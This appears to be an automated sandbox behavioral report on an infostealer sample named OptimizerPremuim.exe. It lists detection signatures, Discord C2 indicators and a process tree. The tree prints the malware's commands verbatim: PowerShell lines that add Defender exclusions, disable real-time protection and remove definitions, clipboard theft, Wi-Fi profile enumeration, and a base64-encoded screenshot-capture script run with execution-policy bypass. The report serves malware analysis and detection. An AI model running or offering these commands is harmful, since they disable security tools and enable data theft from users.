Resubmissions
13-12-2024 13:09
241213-qdy1tayrdz 1012-12-2024 16:44
241212-t88ehsslfm 1007-12-2024 13:47
241207-q3h1wszjcn 10Analysis
-
max time kernel
95s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 13:47
Behavioral task
behavioral1
Sample
OptimizerPremuim.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
OptimizerPremuim.exe
Resource
win10v2004-20241007-en
General
-
Target
OptimizerPremuim.exe
-
Size
5.9MB
-
MD5
093a4722c9529c8418108a3b36fdbc50
-
SHA1
ad07e278be2d58cc69175e809ca3741d0bdc29be
-
SHA256
ae9199799afe47a0c69f0cea10e924b8b72df340163b71f927fe0bcb6b6d7a96
-
SHA512
143ce8b38934724e1473b11a854edd2fa87e1e3de3316e5c5c542face9c3c32368888ef9b3c50949782c22a193d4854eb23855e1a2fb2b06439fe7dec65d2da4
-
SSDEEP
98304:r75moDUN43WQqrjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6a+tMsF:H5umWQoOjmFwDRxtYSHdK34kdai7bN39
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2660 powershell.exe 2260 powershell.exe 4900 powershell.exe 5084 powershell.exe 1380 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3600 cmd.exe 2308 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2384 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe 3616 OptimizerPremuim.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 discord.com 22 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 2020 tasklist.exe 1280 tasklist.exe 4308 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023cd0-21.dat upx behavioral2/memory/3616-25-0x00007FFA6DB50000-0x00007FFA6DFB6000-memory.dmp upx behavioral2/files/0x0007000000023cc3-27.dat upx behavioral2/memory/3616-30-0x00007FFA70BB0000-0x00007FFA70BD4000-memory.dmp upx behavioral2/files/0x0007000000023cce-29.dat upx behavioral2/memory/3616-32-0x00007FFA76D40000-0x00007FFA76D4F000-memory.dmp upx behavioral2/files/0x0007000000023cca-48.dat upx behavioral2/files/0x0007000000023cc9-47.dat upx behavioral2/files/0x0007000000023cc8-46.dat upx behavioral2/files/0x0007000000023cc7-45.dat upx behavioral2/files/0x0007000000023cc6-44.dat upx behavioral2/files/0x0007000000023cc5-43.dat upx behavioral2/files/0x0007000000023cc4-42.dat upx behavioral2/files/0x0007000000023cc2-41.dat upx behavioral2/files/0x0007000000023cd5-40.dat upx behavioral2/files/0x0007000000023cd4-39.dat upx behavioral2/files/0x0007000000023cd3-38.dat upx behavioral2/files/0x0007000000023ccf-35.dat upx behavioral2/files/0x0007000000023ccd-34.dat upx behavioral2/memory/3616-54-0x00007FFA6E580000-0x00007FFA6E5AC000-memory.dmp upx behavioral2/memory/3616-56-0x00007FFA6E810000-0x00007FFA6E828000-memory.dmp upx behavioral2/memory/3616-58-0x00007FFA6E510000-0x00007FFA6E52F000-memory.dmp upx behavioral2/memory/3616-60-0x00007FFA5F0A0000-0x00007FFA5F21A000-memory.dmp upx behavioral2/memory/3616-62-0x00007FFA6E440000-0x00007FFA6E459000-memory.dmp upx behavioral2/memory/3616-66-0x00007FFA6E410000-0x00007FFA6E43E000-memory.dmp upx behavioral2/memory/3616-64-0x00007FFA6FC00000-0x00007FFA6FC0D000-memory.dmp upx behavioral2/memory/3616-74-0x00007FFA70BB0000-0x00007FFA70BD4000-memory.dmp upx behavioral2/memory/3616-73-0x00007FFA5EC60000-0x00007FFA5EFD9000-memory.dmp upx behavioral2/memory/3616-78-0x00007FFA6EF70000-0x00007FFA6EF7D000-memory.dmp upx behavioral2/memory/3616-83-0x00007FFA5EB40000-0x00007FFA5EC58000-memory.dmp upx behavioral2/memory/3616-82-0x00007FFA6E810000-0x00007FFA6E828000-memory.dmp upx behavioral2/memory/3616-77-0x00007FFA6E3F0000-0x00007FFA6E405000-memory.dmp upx behavioral2/memory/3616-71-0x00007FFA5EFE0000-0x00007FFA5F098000-memory.dmp upx behavioral2/memory/3616-70-0x00007FFA6DB50000-0x00007FFA6DFB6000-memory.dmp upx behavioral2/memory/3616-84-0x00007FFA6E510000-0x00007FFA6E52F000-memory.dmp upx behavioral2/memory/3616-168-0x00007FFA5F0A0000-0x00007FFA5F21A000-memory.dmp upx behavioral2/memory/3616-204-0x00007FFA6E440000-0x00007FFA6E459000-memory.dmp upx behavioral2/memory/3616-275-0x00007FFA6E410000-0x00007FFA6E43E000-memory.dmp upx behavioral2/memory/3616-282-0x00007FFA5EFE0000-0x00007FFA5F098000-memory.dmp upx behavioral2/memory/3616-295-0x00007FFA5EC60000-0x00007FFA5EFD9000-memory.dmp upx behavioral2/memory/3616-303-0x00007FFA5F0A0000-0x00007FFA5F21A000-memory.dmp upx behavioral2/memory/3616-302-0x00007FFA6E510000-0x00007FFA6E52F000-memory.dmp upx behavioral2/memory/3616-297-0x00007FFA6DB50000-0x00007FFA6DFB6000-memory.dmp upx behavioral2/memory/3616-298-0x00007FFA70BB0000-0x00007FFA70BD4000-memory.dmp upx behavioral2/memory/3616-332-0x00007FFA6DB50000-0x00007FFA6DFB6000-memory.dmp upx behavioral2/memory/3616-346-0x00007FFA5EB40000-0x00007FFA5EC58000-memory.dmp upx behavioral2/memory/3616-348-0x00007FFA6EF70000-0x00007FFA6EF7D000-memory.dmp upx behavioral2/memory/3616-347-0x00007FFA5EC60000-0x00007FFA5EFD9000-memory.dmp upx behavioral2/memory/3616-344-0x00007FFA6E3F0000-0x00007FFA6E405000-memory.dmp upx behavioral2/memory/3616-342-0x00007FFA5EFE0000-0x00007FFA5F098000-memory.dmp upx behavioral2/memory/3616-341-0x00007FFA6E410000-0x00007FFA6E43E000-memory.dmp upx behavioral2/memory/3616-340-0x00007FFA6FC00000-0x00007FFA6FC0D000-memory.dmp upx behavioral2/memory/3616-339-0x00007FFA6E440000-0x00007FFA6E459000-memory.dmp upx behavioral2/memory/3616-338-0x00007FFA5F0A0000-0x00007FFA5F21A000-memory.dmp upx behavioral2/memory/3616-337-0x00007FFA6E510000-0x00007FFA6E52F000-memory.dmp upx behavioral2/memory/3616-336-0x00007FFA6E810000-0x00007FFA6E828000-memory.dmp upx behavioral2/memory/3616-335-0x00007FFA6E580000-0x00007FFA6E5AC000-memory.dmp upx behavioral2/memory/3616-334-0x00007FFA76D40000-0x00007FFA76D4F000-memory.dmp upx behavioral2/memory/3616-333-0x00007FFA70BB0000-0x00007FFA70BD4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4240 netsh.exe 2564 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3088 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3928 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2660 powershell.exe 2660 powershell.exe 392 powershell.exe 392 powershell.exe 2308 powershell.exe 2308 powershell.exe 392 powershell.exe 2308 powershell.exe 2260 powershell.exe 2260 powershell.exe 4900 powershell.exe 4900 powershell.exe 2660 powershell.exe 2260 powershell.exe 4900 powershell.exe 5084 powershell.exe 5084 powershell.exe 3136 powershell.exe 3136 powershell.exe 1380 powershell.exe 1380 powershell.exe 860 powershell.exe 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1280 tasklist.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: 36 1404 WMIC.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 4308 tasklist.exe Token: SeDebugPrivilege 2020 tasklist.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: 36 1404 WMIC.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeDebugPrivilege 5084 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeIncreaseQuotaPrivilege 4052 WMIC.exe Token: SeSecurityPrivilege 4052 WMIC.exe Token: SeTakeOwnershipPrivilege 4052 WMIC.exe Token: SeLoadDriverPrivilege 4052 WMIC.exe Token: SeSystemProfilePrivilege 4052 WMIC.exe Token: SeSystemtimePrivilege 4052 WMIC.exe Token: SeProfSingleProcessPrivilege 4052 WMIC.exe Token: SeIncBasePriorityPrivilege 4052 WMIC.exe Token: SeCreatePagefilePrivilege 4052 WMIC.exe Token: SeBackupPrivilege 4052 WMIC.exe Token: SeRestorePrivilege 4052 WMIC.exe Token: SeShutdownPrivilege 4052 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2616 wrote to memory of 3616 2616 OptimizerPremuim.exe 83 PID 2616 wrote to memory of 3616 2616 OptimizerPremuim.exe 83 PID 3616 wrote to memory of 2464 3616 OptimizerPremuim.exe 84 PID 3616 wrote to memory of 2464 3616 OptimizerPremuim.exe 84 PID 3616 wrote to memory of 1528 3616 OptimizerPremuim.exe 85 PID 3616 wrote to memory of 1528 3616 OptimizerPremuim.exe 85 PID 3616 wrote to memory of 1540 3616 OptimizerPremuim.exe 86 PID 3616 wrote to memory of 1540 3616 OptimizerPremuim.exe 86 PID 3616 wrote to memory of 1880 3616 OptimizerPremuim.exe 87 PID 3616 wrote to memory of 1880 3616 OptimizerPremuim.exe 87 PID 3616 wrote to memory of 4708 3616 OptimizerPremuim.exe 92 PID 3616 wrote to memory of 4708 3616 OptimizerPremuim.exe 92 PID 2464 wrote to memory of 2660 2464 cmd.exe 93 PID 2464 wrote to memory of 2660 2464 cmd.exe 93 PID 3616 wrote to memory of 3948 3616 OptimizerPremuim.exe 97 PID 3616 wrote to memory of 3948 3616 OptimizerPremuim.exe 97 PID 3616 wrote to memory of 2564 3616 OptimizerPremuim.exe 99 PID 3616 wrote to memory of 2564 3616 OptimizerPremuim.exe 99 PID 3616 wrote to memory of 956 3616 OptimizerPremuim.exe 101 PID 3616 wrote to memory of 956 3616 OptimizerPremuim.exe 101 PID 3616 wrote to memory of 2456 3616 OptimizerPremuim.exe 94 PID 3616 wrote to memory of 2456 3616 OptimizerPremuim.exe 94 PID 3616 wrote to memory of 3600 3616 OptimizerPremuim.exe 95 PID 3616 wrote to memory of 3600 3616 OptimizerPremuim.exe 95 PID 3616 wrote to memory of 4804 3616 OptimizerPremuim.exe 96 PID 3616 wrote to memory of 4804 3616 OptimizerPremuim.exe 96 PID 3616 wrote to memory of 4188 3616 OptimizerPremuim.exe 100 PID 3616 wrote to memory of 4188 3616 OptimizerPremuim.exe 100 PID 3616 wrote to memory of 4812 3616 OptimizerPremuim.exe 98 PID 3616 wrote to memory of 4812 3616 OptimizerPremuim.exe 98 PID 3948 wrote to memory of 3080 3948 cmd.exe 102 PID 3948 wrote to memory of 3080 3948 cmd.exe 102 PID 2456 wrote to memory of 1280 2456 cmd.exe 103 PID 2456 wrote to memory of 1280 2456 cmd.exe 103 PID 4804 wrote to memory of 1404 4804 cmd.exe 104 PID 4804 wrote to memory of 1404 4804 cmd.exe 104 PID 2564 wrote to memory of 4240 2564 cmd.exe 105 PID 2564 wrote to memory of 4240 2564 cmd.exe 105 PID 4708 wrote to memory of 4308 4708 cmd.exe 106 PID 4708 wrote to memory of 4308 4708 cmd.exe 106 PID 4188 wrote to memory of 3928 4188 cmd.exe 107 PID 4188 wrote to memory of 3928 4188 cmd.exe 107 PID 3600 wrote to memory of 2308 3600 cmd.exe 108 PID 3600 wrote to memory of 2308 3600 cmd.exe 108 PID 4812 wrote to memory of 2020 4812 cmd.exe 109 PID 4812 wrote to memory of 2020 4812 cmd.exe 109 PID 956 wrote to memory of 392 956 cmd.exe 110 PID 956 wrote to memory of 392 956 cmd.exe 110 PID 1540 wrote to memory of 4316 1540 cmd.exe 111 PID 1540 wrote to memory of 4316 1540 cmd.exe 111 PID 3616 wrote to memory of 4904 3616 OptimizerPremuim.exe 130 PID 3616 wrote to memory of 4904 3616 OptimizerPremuim.exe 130 PID 4904 wrote to memory of 2932 4904 cmd.exe 114 PID 4904 wrote to memory of 2932 4904 cmd.exe 114 PID 1880 wrote to memory of 2260 1880 cmd.exe 115 PID 1880 wrote to memory of 2260 1880 cmd.exe 115 PID 1528 wrote to memory of 4900 1528 cmd.exe 116 PID 1528 wrote to memory of 4900 1528 cmd.exe 116 PID 3616 wrote to memory of 4832 3616 OptimizerPremuim.exe 117 PID 3616 wrote to memory of 4832 3616 OptimizerPremuim.exe 117 PID 392 wrote to memory of 4008 392 powershell.exe 118 PID 392 wrote to memory of 4008 392 powershell.exe 118 PID 4832 wrote to memory of 4864 4832 cmd.exe 119 PID 4832 wrote to memory of 4864 4832 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe"C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe"C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\OptimizerPremuim.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Reboot Pc', 0, 'Done', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Reboot Pc', 0, 'Done', 48+16);close()"4⤵PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:956 -
